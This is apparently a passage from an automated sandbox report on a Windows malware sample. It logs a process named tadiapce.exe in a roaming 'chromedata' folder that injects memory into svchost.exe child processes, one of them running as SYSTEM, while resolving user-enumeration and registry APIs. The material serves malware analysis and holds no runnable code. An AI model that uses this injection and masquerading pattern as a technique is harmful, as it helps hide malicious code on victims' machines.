Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = ??1type_info@@UAE@XZ, address_out = 0x76fd92b3	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _vsnwprintf, address_out = 0x76f8bbce	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = ??3@YAXPAX@Z, address_out = 0x76f8b0b9	1	Fn
Module	Load	module_name = SHLWAPI.dll, base_address = 0x771d0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = StrFormatByteSizeW, address_out = 0x7720169d	1	Fn
Module	Load	module_name = NETAPI32.dll, base_address = 0x73c20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\netapi32.dll, function = NetUserEnum, address_out = 0x735c59cf	1	Fn
Module	Get Address	module_name = c:\windows\system32\netapi32.dll, function = NetApiBufferFree, address_out = 0x73c113d2	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:32:42 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 11001237	1	Fn
System	Get Time	type = Performance Ctr, time = 22777403885	1	Fn
Module	Get Handle	module_name = c:\windows\system32\svchost.exe, base_address = 0x600000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegGetValueW, address_out = 0x774d0e47	1	Fn

Process #34: svchost.exe

Information	Value
ID	#34
File Name	c:\windows\system32\svchost.exe
Command Line	svchost.exe
Initial Working Directory	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\
Monitor	Start Time: 00:02:34, Reason: Child Process
Unmonitor	End Time: 00:02:37, Reason: Crashed
Monitor Duration	00:00:02

OS Process Information

Information	Value
PID	0xa60
Parent PID	0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x A94

Injection Information

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x50000, size = 367	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x60000, size = 112	62	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x602104, size = 12	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10000000, size = 1024	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10001000, size = 10240	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004000, size = 3584	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10005000, size = 1004	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10005000, size = 512	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10006000, size = 1024	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 26	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x70000, size = 12	7	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 17	7	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x70000, size = 16	45	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004018, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 14	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000401c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 15	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004020, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 20	5	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004024, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 9	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004028, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000402c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 12	5	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004030, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 10	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004034, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004038, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000403c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 25	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004040, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 18	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004044, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004048, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 24	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000404c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004050, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 19	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004054, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 13	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004058, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000405c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 27	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004060, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 6	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004064, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004068, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 28	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000406c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004000, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004004, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004008, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000400c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004010, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 21	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040c8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040cc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040d0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040d4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040d8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 16	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004080, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004084, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004088, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000408c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 22	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000409c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040a0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 11	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040a4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040a8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 5	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040ac, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 7	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040b0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040b4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040b8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040bc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040c0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004094, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004074, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004078, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x70000, size = 1024	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100000, size = 388	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x350000, size = 40	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x9e4	address = 0x360000, size = 20	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100000, size = 128	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x370000, size = 44	1	Fn Data

Threads

Thread 0xa94

Category	Operation	Information	Count	Logfile
Module	Load	module_name = KERNEL32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleW, address_out = 0x76b6374d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetVersionExW, address_out = 0x76b53b1a	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76b6450e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapFree, address_out = 0x76b5bbd0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcessHeap, address_out = 0x76b61280	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapReAlloc, address_out = 0x7739ff51	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapAlloc, address_out = 0x77382dd6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrlenW, address_out = 0x76b5d9e8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x76b5cf41	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76b6ed38	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcess, address_out = 0x76b5cdcf	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TerminateProcess, address_out = 0x76b52331	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76b62fde	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76b5cac4	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76b5bb80	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetTickCount, address_out = 0x76b5ba60	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76b5bb9f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InterlockedCompareExchange, address_out = 0x76b5bb92	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Sleep, address_out = 0x76b5ba46	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InterlockedExchange, address_out = 0x76b5bf0a	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76b63d01	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x774c0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegEnumKeyExW, address_out = 0x774d46c8	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExW, address_out = 0x774d468d	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegQueryValueExW, address_out = 0x774d46ad	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x774d469d	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x774d46e7	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x76cd0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoInitializeSecurity, address_out = 0x76cf7259	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x76d19d0b	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoSetProxyBlanket, address_out = 0x76ce5ea5	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoUninitialize, address_out = 0x76d186d3	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoInitializeEx, address_out = 0x76d109ad	1	Fn
Module	Load	module_name = OLEAUT32.dll, base_address = 0x76a60000	1	Fn
Module	Get Address	module_name = c:\windows\system32\oleaut32.dll, function = 12, address_out = 0x76a65dee	1	Fn
Module	Get Address	module_name = c:\windows\system32\oleaut32.dll, function = 7, address_out = 0x76a64680	1	Fn
Module	Get Address	module_name = c:\windows\system32\oleaut32.dll, function = 9, address_out = 0x76a63eae	1	Fn
Module	Get Address	module_name = c:\windows\system32\oleaut32.dll, function = 2, address_out = 0x76a64642	1	Fn
Module	Load	module_name = msvcrt.dll, base_address = 0x76f80000	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _except_handler4_common, address_out = 0x76fa3e27	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = ??2@YAPAXI@Z, address_out = 0x76f8b0c9	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _amsg_exit, address_out = 0x76feb2ef	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _initterm, address_out = 0x76f8c151	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = free, address_out = 0x76f89894	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = malloc, address_out = 0x76f89cee	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _XcptFilter, address_out = 0x76fadc75	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = ??1type_info@@UAE@XZ, address_out = 0x76fd92b3	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _vsnwprintf, address_out = 0x76f8bbce	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = ??3@YAXPAX@Z, address_out = 0x76f8b0b9	1	Fn
Module	Load	module_name = SHLWAPI.dll, base_address = 0x771d0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = StrFormatByteSizeW, address_out = 0x7720169d	1	Fn
Module	Load	module_name = NETAPI32.dll, base_address = 0x73c20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\netapi32.dll, function = NetUserEnum, address_out = 0x735c59cf	1	Fn
Module	Get Address	module_name = c:\windows\system32\netapi32.dll, function = NetApiBufferFree, address_out = 0x73c113d2	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:32:43 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 11002469	1	Fn
System	Get Time	type = Performance Ctr, time = 22901016553	1	Fn
Module	Get Handle	module_name = c:\windows\system32\svchost.exe, base_address = 0x600000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegGetValueW, address_out = 0x774d0e47	1	Fn

Process #35: svchost.exe

79363

Information	Value
ID	#35
File Name	c:\windows\system32\svchost.exe
Command Line	svchost.exe
Initial Working Directory	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\
Monitor	Start Time: 00:03:07, Reason: Child Process
Unmonitor	End Time: 00:04:16, Reason: Terminated by Timeout
Monitor Duration	00:01:09

OS Process Information

Information	Value
PID	0x110
Parent PID	0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	System (Elevated)
Username	NT AUTHORITY\SYSTEM
Enabled Privileges	SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs	0x 418 0x 68C 0x 7E4 0x A3C 0x 670 0x A34 0x BC8 0x CFC 0x CF8

Injection Information

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x50000, size = 367	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x60000, size = 112	116	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x602104, size = 12	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10000000, size = 1024	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10001000, size = 343040	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055000, size = 80384	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10069000, size = 165288	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10069000, size = 154624	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10092000, size = 512	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10093000, size = 512	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10094000, size = 12288	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 26	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0xe0000, size = 12	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0xe0000, size = 16	113	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100550b8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 21	6	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100550bc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100550c0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 13	15	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100550c4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 14	8	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100550c8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 10	7	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100550cc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100550d0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 22	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100550d4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 12	14	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100550d8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 18	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100550dc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 15	12	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100550e0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100550e4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 20	5	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100550e8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100550ec, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100550f0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 17	8	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100550f4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100550f8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100550fc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055100, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055104, size = 4	1	Fn Data
